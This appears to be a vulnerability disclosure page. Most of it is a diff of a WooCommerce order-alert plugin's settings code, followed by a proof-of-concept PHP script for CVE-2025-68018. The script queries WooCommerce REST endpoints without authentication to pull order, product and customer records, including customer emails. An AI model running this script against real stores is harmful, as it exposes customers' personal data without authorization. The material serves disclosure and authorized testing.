 			echo '<div class="pb_settings wpdk_settings-options' . esc_attr( $theme . $class . $wrapper_class ) . '" data-slug="' . esc_attr( $this->args['menu_slug'] ) . '" data-unique="' . esc_attr( $this->unique ) . '">';

@@ -559,8 +562,8 @@
 			echo '<div class="wpdk_settings-header-left">';
 			echo '<h1>' .
 			     esc_html( $this->args['framework_title'] ) .
-			     ( empty( $product_version ) ? '' : sprintf( '<a href="%s" target="_blank" class="wpdk_settings-version-free">Version %s</a>', $product_url, $product_version ) ) .
-			     ( empty( $product_version_pro ) ? '' : sprintf( '<a href="%s" target="_blank" class="wpdk_settings-version-pro">Pro %s</a>', $product_url, $product_version_pro ) ) .
+			     ( empty( $product_version ) ? '' : sprintf( '<a href="%s" target="_blank" class="wpdk_settings-version-free">Version %s</a>', $product_url, $product_version ) ) . // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
+			     ( empty( $product_version_pro ) ? '' : sprintf( '<a href="%s" target="_blank" class="wpdk_settings-version-pro">Pro %s</a>', $product_url, $product_version_pro ) ) . // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
 			     '</h1>';
 			echo '</div>';

@@ -571,11 +574,11 @@

 			echo '<div class="wpdk_settings-form-result wpdk_settings-form-success ' . esc_attr( $notice_class ) . '">' . esc_html( $notice_text ) . '</div>';

-			echo ( $this->args['show_form_warning'] ) ? '<div class="wpdk_settings-form-result wpdk_settings-form-warning">' . esc_html__( 'Save your changes!' ) . '</div>' : '';
+			echo ( $this->args['show_form_warning'] ) ? '<div class="wpdk_settings-form-result wpdk_settings-form-warning">' . esc_html__( 'Save your changes!', 'woc-order-alert' ) . '</div>' : '';

-			echo ( $has_nav && $this->args['show_all_options'] ) ? '<div class="wpdk_settings-expand-all" title="' . esc_html__( 'show all settings' ) . '"><i class="fas fa-outdent"></i></div>' : '';
+			echo ( $has_nav && $this->args['show_all_options'] ) ? '<div class="wpdk_settings-expand-all" title="' . esc_html__( 'show all settings', 'woc-order-alert' ) . '"><i class="fas fa-outdent"></i></div>' : '';

-			echo ( $this->args['show_search'] ) ? '<div class="wpdk_settings-search"><input type="text" name="wpdk_settings-search" placeholder="' . esc_html__( 'Search...' ) . '" autocomplete="off" /></div>' : '';
+			echo ( $this->args['show_search'] ) ? '<div class="wpdk_settings-search"><input type="text" name="wpdk_settings-search" placeholder="' . esc_html__( 'Search...', 'woc-order-alert' ) . '" autocomplete="off" /></div>' : '';

 			echo '<div class="wpdk_settings-buttons">';

@@ -585,9 +588,9 @@
 				}
 			}

-			echo '<input type="submit" name="' . esc_attr( $this->unique ) . '[_nonce][save]" class="button button-primary wpdk_settings-top-save wpdk_settings-save' . esc_attr( $ajax_class ) . '" value="' . esc_html__( 'Save' ) . '" data-save="' . esc_html__( 'Saving...' ) . '">';
-			echo ( $this->args['show_reset_section'] ) ? '<input type="submit" name="pb_settings_transient[reset_section]" class="button button-secondary wpdk_settings-reset-section wpdk_settings-confirm" value="' . esc_html__( 'Reset Section' ) . '" data-confirm="' . esc_html__( 'Are you sure to reset this section options?' ) . '">' : '';
-			echo ( $this->args['show_reset_all'] ) ? '<input type="submit" name="pb_settings_transient[reset]" class="button wpdk_settings-warning-primary wpdk_settings-reset-all wpdk_settings-confirm" value="' . ( ( $this->args['show_reset_section'] ) ? esc_html__( 'Reset All' ) : esc_html__( 'Reset' ) ) . '" data-confirm="' . esc_html__( 'Are you sure you want to reset all settings to default values?' ) . '">' : '';
+			echo '<input type="submit" name="' . esc_attr( $this->unique ) . '[_nonce][save]" class="button button-primary wpdk_settings-top-save wpdk_settings-save' . esc_attr( $ajax_class ) . '" value="' . esc_html__( 'Save', 'woc-order-alert' ) . '" data-save="' . esc_html__( 'Saving...', 'woc-order-alert' ) . '">';
+			echo ( $this->args['show_reset_section'] ) ? '<input type="submit" name="pb_settings_transient[reset_section]" class="button button-secondary wpdk_settings-reset-section wpdk_settings-confirm" value="' . esc_html__( 'Reset Section', 'woc-order-alert' ) . '" data-confirm="' . esc_html__( 'Are you sure to reset this section options?', 'woc-order-alert' ) . '">' : '';
+			echo ( $this->args['show_reset_all'] ) ? '<input type="submit" name="pb_settings_transient[reset]" class="button wpdk_settings-warning-primary wpdk_settings-reset-all wpdk_settings-confirm" value="' . ( ( $this->args['show_reset_section'] ) ? esc_html__( 'Reset All', 'woc-order-alert' ) : esc_html__( 'Reset', 'woc-order-alert' ) ) . '" data-confirm="' . esc_html__( 'Are you sure you want to reset all settings to default values?', 'woc-order-alert' ) . '">' : '';
 			echo '</div>';

 			echo '</div>';
@@ -684,7 +687,7 @@
 				} elseif ( $section['external'] && isset( $section['id'] ) ) {
 					do_action( 'WPDK_Settings/section/' . $section['id'], $section );
 				} else {
-					echo '<div class="wpdk_settings-no-option">' . esc_html__( 'No data available.' ) . '</div>';
+					echo '<div class="wpdk_settings-no-option">' . esc_html__( 'No data available.', 'woc-order-alert' ) . '</div>';
 				}

 				echo '</div>';
@@ -707,13 +710,13 @@

 				if ( ! empty( $this->args['show_footer_buttons'] ) ) {
 					echo '<div class="wpdk_settings-buttons">';
-					echo '<input type="submit" name="pb_settings_transient[save]" class="button button-primary wpdk_settings-save' . esc_attr( $ajax_class ) . '" value="' . esc_html__( 'Save' ) . '" data-save="' . esc_html__( 'Saving...' ) . '">';
-					echo ( $this->args['show_reset_section'] ) ? '<input type="submit" name="pb_settings_transient[reset_section]" class="button button-secondary wpdk_settings-reset-section wpdk_settings-confirm" value="' . esc_html__( 'Reset Section' ) . '" data-confirm="' . esc_html__( 'Are you sure to reset this section options?' ) . '">' : '';
-					echo ( $this->args['show_reset_all'] ) ? '<input type="submit" name="pb_settings_transient[reset]" class="button wpdk_settings-warning-primary wpdk_settings-reset-all wpdk_settings-confirm" value="' . ( ( $this->args['show_reset_section'] ) ? esc_html__( 'Reset All' ) : esc_html__( 'Reset' ) ) . '" data-confirm="' . esc_html__( 'Are you sure you want to reset all settings to default values?' ) . '">' : '';
+					echo '<input type="submit" name="pb_settings_transient[save]" class="button button-primary wpdk_settings-save' . esc_attr( $ajax_class ) . '" value="' . esc_html__( 'Save', 'woc-order-alert' ) . '" data-save="' . esc_html__( 'Saving...', 'woc-order-alert' ) . '">';
+					echo ( $this->args['show_reset_section'] ) ? '<input type="submit" name="pb_settings_transient[reset_section]" class="button button-secondary wpdk_settings-reset-section wpdk_settings-confirm" value="' . esc_html__( 'Reset Section', 'woc-order-alert' ) . '" data-confirm="' . esc_html__( 'Are you sure to reset this section options?', 'woc-order-alert' ) . '">' : '';
+					echo ( $this->args['show_reset_all'] ) ? '<input type="submit" name="pb_settings_transient[reset]" class="button wpdk_settings-warning-primary wpdk_settings-reset-all wpdk_settings-confirm" value="' . ( ( $this->args['show_reset_section'] ) ? esc_html__( 'Reset All', 'woc-order-alert' ) : esc_html__( 'Reset', 'woc-order-alert' ) ) . '" data-confirm="' . esc_html__( 'Are you sure you want to reset all settings to default values?', 'woc-order-alert' ) . '">' : '';
 					echo '</div>';
 				}

-				echo ( ! empty( $this->args['footer_text'] ) ) ? '<div class="wpdk_settings-copyright">' . $this->args['footer_text'] . '</div>' : '';
+				echo ( ! empty( $this->args['footer_text'] ) ) ? '<div class="wpdk_settings-copyright">' . $this->args['footer_text'] . '</div>' : ''; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped

 				echo '<div class="clear"></div>';
 				echo '</div>';
@@ -726,11 +729,11 @@

 			echo '<div class="clear"></div>';

-			echo ( ! empty( $this->args['footer_after'] ) ) ? $this->args['footer_after'] : '';
+			echo ( ! empty( $this->args['footer_after'] ) ) ? $this->args['footer_after'] : ''; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped

 			echo '</div>';

-			do_action( 'pb_settings_options_after' );
+			do_action( 'pb_settings_options_after' ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 		}
 	}
--- a/woc-order-alert/includes/wp-dev-kit/settings/classes/comment-options.class.php
+++ b/woc-order-alert/includes/wp-dev-kit/settings/classes/comment-options.class.php
@@ -31,8 +31,8 @@
 		public function __construct( $key, $params = array() ) {

 			$this->unique     = $key;
-			$this->args       = apply_filters( "pb_settings_{$this->unique}_args", wp_parse_args( $params['args'], $this->args ), $this );
-			$this->sections   = apply_filters( "pb_settings_{$this->unique}_sections", $params['sections'], $this );
+			$this->args       = apply_filters( "pb_settings_{$this->unique}_args", wp_parse_args( $params['args'], $this->args ), $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+			$this->sections   = apply_filters( "pb_settings_{$this->unique}_sections", $params['sections'], $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
 			$this->pre_fields = $this->pre_fields( $this->sections );

 			add_action( 'add_meta_boxes_comment', array( $this, 'add_comment_meta_box' ) );
@@ -196,7 +196,7 @@

 				} else {

-					echo '<div class="wpdk_settings-no-option">' . esc_html__( 'No data available.' ) . '</div>';
+					echo '<div class="wpdk_settings-no-option">' . esc_html__( 'No data available.', 'woc-order-alert' ) . '</div>';

 				}

@@ -213,8 +213,8 @@
 				echo '<div class="wpdk_settings-sections-reset">';
 				echo '<label>';
 				echo '<input type="checkbox" name="' . esc_attr( $this->unique ) . '[_reset]" />';
-				echo '<span class="button wpdk_settings-button-reset">' . esc_html__( 'Reset' ) . '</span>';
-				echo '<span class="button wpdk_settings-button-cancel">' . sprintf( '<small>( %s )</small> %s', esc_html__( 'update post' ), esc_html__( 'Cancel' ) ) . '</span>';
+				echo '<span class="button wpdk_settings-button-reset">' . esc_html__( 'Reset', 'woc-order-alert' ) . '</span>';
+				echo '<span class="button wpdk_settings-button-cancel">' . sprintf( '<small>( %s )</small> %s', esc_html__( 'update post', 'woc-order-alert' ), esc_html__( 'Cancel', 'woc-order-alert' ) ) . '</span>';
 				echo '</label>';
 				echo '</div>';

@@ -308,9 +308,9 @@

 			}

-			$data = apply_filters( "pb_settings_{$this->unique}_save", $data, $comment_id, $this );
+			$data = apply_filters( "pb_settings_{$this->unique}_save", $data, $comment_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

-			do_action( "pb_settings_{$this->unique}_save_before", $data, $comment_id, $this );
+			do_action( "pb_settings_{$this->unique}_save_before", $data, $comment_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 			if ( empty( $data ) || ! empty( $request['_reset'] ) ) {

@@ -338,9 +338,9 @@

 			}

-			do_action( "pb_settings_{$this->unique}_saved", $data, $comment_id, $this );
+			do_action( "pb_settings_{$this->unique}_saved", $data, $comment_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

-			do_action( "pb_settings_{$this->unique}_save_after", $data, $comment_id, $this );
+			do_action( "pb_settings_{$this->unique}_save_after", $data, $comment_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 		}
 	}
--- a/woc-order-alert/includes/wp-dev-kit/settings/classes/customize-options.class.php
+++ b/woc-order-alert/includes/wp-dev-kit/settings/classes/customize-options.class.php
@@ -33,8 +33,8 @@
     public function __construct( $key, $params ) {

       $this->unique     = $key;
-      $this->args       = apply_filters( "pb_settings_{$this->unique}_args", wp_parse_args( $params['args'], $this->args ), $this );
-      $this->sections   = apply_filters( "pb_settings_{$this->unique}_sections", $params['sections'], $this );
+      $this->args       = apply_filters( "pb_settings_{$this->unique}_args", wp_parse_args( $params['args'], $this->args ), $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+      $this->sections   = apply_filters( "pb_settings_{$this->unique}_sections", $params['sections'], $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
       $this->pre_fields = $this->pre_fields( $this->sections );

       $this->get_options();
@@ -59,9 +59,9 @@
     }

     public function add_customize_save_after( $wp_customize ) {
-      do_action( "pb_settings_{$this->unique}_save_before", $this->get_options(), $this, $wp_customize );
-      do_action( "pb_settings_{$this->unique}_saved", $this->get_options(), $this, $wp_customize );
-      do_action( "pb_settings_{$this->unique}_save_after", $this->get_options(), $this, $wp_customize );
+      do_action( "pb_settings_{$this->unique}_save_before", $this->get_options(), $this, $wp_customize ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+      do_action( "pb_settings_{$this->unique}_saved", $this->get_options(), $this, $wp_customize ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+      do_action( "pb_settings_{$this->unique}_save_after", $this->get_options(), $this, $wp_customize ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
     }

     // get default value
--- a/woc-order-alert/includes/wp-dev-kit/settings/classes/metabox-options.class.php
+++ b/woc-order-alert/includes/wp-dev-kit/settings/classes/metabox-options.class.php
@@ -40,8 +40,8 @@
 		public function __construct( $key, $params = array() ) {

 			$this->unique         = $key;
-			$this->args           = apply_filters( "pb_settings_{$this->unique}_args", wp_parse_args( $params['args'], $this->args ), $this );
-			$this->sections       = apply_filters( "pb_settings_{$this->unique}_sections", $params['sections'], $this );
+			$this->args           = apply_filters( "pb_settings_{$this->unique}_args", wp_parse_args( $params['args'], $this->args ), $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+			$this->sections       = apply_filters( "pb_settings_{$this->unique}_sections", $params['sections'], $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
 			$this->post_type      = ( is_array( $this->args['post_type'] ) ) ? $this->args['post_type'] : array_filter( (array) $this->args['post_type'] );
 			$this->post_formats   = ( is_array( $this->args['post_formats'] ) ) ? $this->args['post_formats'] : array_filter( (array) $this->args['post_formats'] );
 			$this->page_templates = ( is_array( $this->args['page_templates'] ) ) ? $this->args['page_templates'] : array_filter( (array) $this->args['page_templates'] );
@@ -222,7 +222,7 @@
 					$tab_error = ( ! empty( $errors['sections'][ $tab_key ] ) ) ? '<i class="wpdk_settings-label-error wpdk_settings-error">!</i>' : '';
 					$tab_icon  = ( ! empty( $section['icon'] ) ) ? '<i class="wpdk_settings-tab-icon ' . esc_attr( $section['icon'] ) . '"></i>' : '';

-					printf( '<li><a href="#" data-section="%s">%s%s%s</a></li>', ( $this->unique . '_' . $tab_key ), $tab_icon, $section['title'], $tab_error );
+					printf( '<li><a href="#" data-section="%s">%s%s%s</a></li>', ( $this->unique . '_' . $tab_key ), $tab_icon, $section['title'], $tab_error ); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped

 					$tab_key ++;
 				}
@@ -275,7 +275,7 @@
 					do_action( 'WPDK_Settings/meta_section/' . $section['id'], $section );

 				} else {
-					echo '<div class="wpdk_settings-no-option">' . esc_html__( 'No data available.' ) . '</div>';
+					echo '<div class="wpdk_settings-no-option">' . esc_html__( 'No data available.', 'woc-order-alert' ) . '</div>';
 				}

 				echo '</div>';
@@ -291,8 +291,8 @@
 				echo '<div class="wpdk_settings-sections-reset">';
 				echo '<label>';
 				echo '<input type="checkbox" name="' . esc_attr( $this->unique ) . '[_reset]" />';
-				echo '<span class="button wpdk_settings-button-reset">' . esc_html__( 'Reset' ) . '</span>';
-				echo '<span class="button wpdk_settings-button-cancel">' . sprintf( '<small>( %s )</small> %s', esc_html__( 'update post' ), esc_html__( 'Cancel' ) ) . '</span>';
+				echo '<span class="button wpdk_settings-button-reset">' . esc_html__( 'Reset', 'woc-order-alert' ) . '</span>';
+				echo '<span class="button wpdk_settings-button-cancel">' . sprintf( '<small>( %s )</small> %s', esc_html__( 'update post', 'woc-order-alert' ), esc_html__( 'Cancel', 'woc-order-alert' ) ) . '</span>';
 				echo '</label>';
 				echo '</div>';

@@ -325,7 +325,7 @@

 			// XSS ok.
 			// No worries, This "POST" requests is sanitizing in the below foreach.
-			$request = ( ! empty( $_POST[ $this->unique ] ) ) ? wp_unslash( $_POST[ $this->unique ] ) : array();
+			$request = ( ! empty( $_POST[ $this->unique ] ) ) ? wp_unslash( $_POST[ $this->unique ] ) : array(); // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized

 			if ( ! empty( $request ) ) {

@@ -395,9 +395,9 @@

 			}

-			$data = apply_filters( "pb_settings_{$this->unique}_save", $data, $post_id, $this );
+			$data = apply_filters( "pb_settings_{$this->unique}_save", $data, $post_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

-			do_action( "pb_settings_{$this->unique}_save_before", $data, $post_id, $this );
+			do_action( "pb_settings_{$this->unique}_save_before", $data, $post_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 			if ( empty( $data ) || ! empty( $request['_reset'] ) ) {

@@ -425,9 +425,9 @@

 			}

-			do_action( "pb_settings_{$this->unique}_saved", $data, $post_id, $this );
+			do_action( "pb_settings_{$this->unique}_saved", $data, $post_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

-			do_action( "pb_settings_{$this->unique}_save_after", $data, $post_id, $this );
+			do_action( "pb_settings_{$this->unique}_save_after", $data, $post_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 		}
 	}
--- a/woc-order-alert/includes/wp-dev-kit/settings/classes/nav-menu-options.class.php
+++ b/woc-order-alert/includes/wp-dev-kit/settings/classes/nav-menu-options.class.php
@@ -24,8 +24,8 @@
 		public function __construct( $key, $params ) {

 			$this->unique   = $key;
-			$this->args     = apply_filters( "pb_settings_{$this->unique}_args", wp_parse_args( $params['args'], $this->args ), $this );
-			$this->sections = apply_filters( "pb_settings_{$this->unique}_sections", $params['sections'], $this );
+			$this->args     = apply_filters( "pb_settings_{$this->unique}_args", wp_parse_args( $params['args'], $this->args ), $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+			$this->sections = apply_filters( "pb_settings_{$this->unique}_sections", $params['sections'], $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 			add_action( 'wp_nav_menu_item_custom_fields', array( $this, 'wp_nav_menu_item_custom_fields' ), 10, 4 );
 			add_action( 'wp_update_nav_menu_item', array( $this, 'wp_update_nav_menu_item' ), 10, 3 );
@@ -215,9 +215,9 @@

 			}

-			$data = apply_filters( "pb_settings_{$this->unique}_save", $data, $menu_item_db_id, $this );
+			$data = apply_filters( "pb_settings_{$this->unique}_save", $data, $menu_item_db_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

-			do_action( "pb_settings_{$this->unique}_save_before", $data, $menu_item_db_id, $this );
+			do_action( "pb_settings_{$this->unique}_save_before", $data, $menu_item_db_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 			if ( empty( $data ) ) {

@@ -245,9 +245,9 @@

 			}

-			do_action( "pb_settings_{$this->unique}_saved", $data, $menu_item_db_id, $this );
+			do_action( "pb_settings_{$this->unique}_saved", $data, $menu_item_db_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

-			do_action( "pb_settings_{$this->unique}_save_after", $data, $menu_item_db_id, $this );
+			do_action( "pb_settings_{$this->unique}_save_after", $data, $menu_item_db_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 		}

--- a/woc-order-alert/includes/wp-dev-kit/settings/classes/profile-options.class.php
+++ b/woc-order-alert/includes/wp-dev-kit/settings/classes/profile-options.class.php
@@ -24,8 +24,8 @@
 		public function __construct( $key, $params ) {

 			$this->unique   = $key;
-			$this->args     = apply_filters( "pb_settings_{$this->unique}_args", wp_parse_args( $params['args'], $this->args ), $this );
-			$this->sections = apply_filters( "pb_settings_{$this->unique}_sections", $params['sections'], $this );
+			$this->args     = apply_filters( "pb_settings_{$this->unique}_args", wp_parse_args( $params['args'], $this->args ), $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+			$this->sections = apply_filters( "pb_settings_{$this->unique}_sections", $params['sections'], $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 			add_action( 'admin_init', array( $this, 'add_profile_options' ) );

@@ -206,9 +206,9 @@

 			}

-			$data = apply_filters( "pb_settings_{$this->unique}_save", $data, $user_id, $this );
+			$data = apply_filters( "pb_settings_{$this->unique}_save", $data, $user_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

-			do_action( "pb_settings_{$this->unique}_save_before", $data, $user_id, $this );
+			do_action( "pb_settings_{$this->unique}_save_before", $data, $user_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 			if ( empty( $data ) ) {

@@ -236,9 +236,9 @@

 			}

-			do_action( "pb_settings_{$this->unique}_saved", $data, $user_id, $this );
+			do_action( "pb_settings_{$this->unique}_saved", $data, $user_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

-			do_action( "pb_settings_{$this->unique}_save_after", $data, $user_id, $this );
+			do_action( "pb_settings_{$this->unique}_save_after", $data, $user_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 		}
 	}
--- a/woc-order-alert/includes/wp-dev-kit/settings/classes/setup.class.php
+++ b/woc-order-alert/includes/wp-dev-kit/settings/classes/setup.class.php
@@ -11,6 +11,8 @@
 use WPDKClient;
 use WPDKUtils;

+defined( 'ABSPATH' ) || exit;
+
 if ( ! class_exists( 'WPDK_Settings' ) ) {
 	class WPDK_Settings {

@@ -66,7 +68,7 @@
 		public function __construct() {

 			// Init action
-			do_action( 'pb_settings_init' );
+			do_action( 'pb_settings_init' ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 			add_action( 'after_setup_theme', array( 'WPDK_Settings', 'setup' ) );
 			add_action( 'init', array( 'WPDK_Settings', 'setup' ) );
@@ -174,7 +176,7 @@
 			// Setup taxonomy option framework
 			$params = array();
 			if ( class_exists( 'WPDK_Settings_Taxonomy_Options' ) && ! empty( self::$args['taxonomy_options'] ) ) {
-				$taxonomy = ( isset( $_GET['taxonomy'] ) ) ? sanitize_text_field( wp_unslash( $_GET['taxonomy'] ) ) : '';
+				$taxonomy = ( isset( $_GET['taxonomy'] ) ) ? sanitize_text_field( wp_unslash( $_GET['taxonomy'] ) ) : ''; // phpcs:ignore WordPress.Security.NonceVerification.Recommended, WordPress.Security.NonceVerification.Recommended
 				foreach ( self::$args['taxonomy_options'] as $key => $value ) {
 					if ( ! empty( self::$args['sections'][ $key ] ) && ! isset( self::$inited[ $key ] ) ) {

@@ -245,7 +247,7 @@

 			}

-			do_action( 'pb_settings_loaded' );
+			do_action( 'pb_settings_loaded' ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
 		}

 		/**
@@ -360,7 +362,7 @@

 			$path     = '';
 			$file     = ltrim( $file, '/' );
-			$override = apply_filters( 'pb_settings_override', 'wpdk_settings-override' );
+			$override = apply_filters( 'pb_settings_override', 'wpdk_settings-override' ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 			if ( file_exists( get_parent_theme_file_path( $override . '/' . $file ) ) ) {
 				$path = get_parent_theme_file_path( $override . '/' . $file );
@@ -436,7 +438,7 @@
 			}

 			// Include all framework fields
-			$fields = apply_filters( 'pb_settings_fields', array(
+			$fields = apply_filters( 'pb_settings_fields', array( // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
 				'accordion',
 				'background',
 				'backup',
@@ -589,7 +591,7 @@

 			}

-			if ( ! apply_filters( 'pb_settings_enqueue_assets', self::$enqueue ) ) {
+			if ( ! apply_filters( 'pb_settings_enqueue_assets', self::$enqueue ) ) { // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
 				return;
 			}

@@ -601,11 +603,11 @@
 			wp_enqueue_script( 'wp-color-picker' );

 			// Font awesome 4 and 5 loader
-			if ( apply_filters( 'pb_settings_fa4', false ) ) {
-				wp_enqueue_style( 'wpdk_settings-fa', 'https://cdn.jsdelivr.net/npm/font-awesome@4.7.0/css/font-awesome.min.css', array(), '4.7.0', 'all' );
+			if ( apply_filters( 'pb_settings_fa4', false ) ) { // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+				wp_enqueue_style( 'wpdk_settings-fa', 'https://cdn.jsdelivr.net/npm/font-awesome@4.7.0/css/font-awesome.min.css', array(), '4.7.0', 'all' ); // phpcs:ignore PluginCheck.CodeAnalysis.EnqueuedResourceOffloading.OffloadedContent
 			} else {
-				wp_enqueue_style( 'wpdk_settings-fa5', 'https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css', array(), '5.15.5', 'all' );
-				wp_enqueue_style( 'wpdk_settings-fa5-v4-shims', 'https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/v4-shims.min.css', array(), '5.15.5', 'all' );
+				wp_enqueue_style( 'wpdk_settings-fa5', 'https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css', array(), '5.15.5', 'all' ); // phpcs:ignore PluginCheck.CodeAnalysis.EnqueuedResourceOffloading.OffloadedContent
+				wp_enqueue_style( 'wpdk_settings-fa5-v4-shims', 'https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/v4-shims.min.css', array(), '5.15.5', 'all' ); // phpcs:ignore PluginCheck.CodeAnalysis.EnqueuedResourceOffloading.OffloadedContent
 			}

 			$version = defined( 'PB_CLEAN_CACHE' ) && PB_CLEAN_CACHE ? time() : self::$version;
@@ -624,13 +626,13 @@
 			wp_enqueue_script( 'pb_settings', self::include_plugin_url( 'assets/js/main.js' ), array( 'wpdk_settings-plugins' ), $version, true );

 			// Main variables
-			wp_localize_script( 'pb_settings', 'pb_settings_vars', array(
-				'color_palette' => apply_filters( 'pb_settings_color_palette', array() ),
+			wp_localize_script( 'pb_settings', 'pb_settings_vars', array(
+				'color_palette' => apply_filters( 'pb_settings_color_palette', array() ), // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
 		

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68018 - Order Listener for WooCommerce <= 3.6.1 - Missing Authorization

<?php
/**
 * Proof of Concept for CVE-2025-68018
 * Demonstrates unauthorized access to WooCommerce REST API
 * when Order Listener for WooCommerce plugin <= 3.6.1 is active.
 */

$target_url = 'https://example.com'; // CHANGE THIS to target WordPress site

// WooCommerce REST API endpoints that would normally require authentication
$endpoints = [
    '/wp-json/wc/v3/orders',           // List all orders
    '/wp-json/wc/v3/orders/123',       // Get specific order (change ID)
    '/wp-json/wc/v3/products',         // List products
    '/wp-json/wc/v3/customers',        // List customers
];

foreach ($endpoints as $endpoint) {
    $url = $target_url . $endpoint;
    
    echo "n[+] Testing endpoint: $endpointn";
    echo "    URL: $urln";
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); // For testing only
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    
    // No authentication headers - testing unauthenticated access
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    
    curl_close($ch);
    
    echo "    HTTP Status: $http_coden";
    
    if ($http_code == 200) {
        echo "    [+] VULNERABLE: Successfully accessed REST API without authenticationn";
        echo "    Response preview: " . substr($response, 0, 200) . "...n";
        
        // Parse JSON response to show data exposure
        $data = json_decode($response, true);
        if (is_array($data)) {
            if (isset($data[0]['id'])) {
                echo "    [+] Found " . count($data) . " recordsn";
                if (count($data) > 0) {
                    echo "    First record ID: " . $data[0]['id'] . "n";
                    if (isset($data[0]['billing'])) {
                        echo "    Customer email: " . ($data[0]['billing']['email'] ?? 'N/A') . "n";
                    }
                }
            } elseif (isset($data['id'])) {
                echo "    [+] Accessed single record ID: " . $data['id'] . "n";
                if (isset($data['billing'])) {
                    echo "    Customer email: " . ($data['billing']['email'] ?? 'N/A') . "n";
                }
            }
        }
    } elseif ($http_code == 401 || $http_code == 403) {
        echo "    [-] NOT VULNERABLE: Received authentication/authorization errorn";
    } else {
        echo "    [?] Unexpected response coden";
    }
}

// Also test with POST method to check write access
$test_order_url = $target_url . '/wp-json/wc/v3/orders';
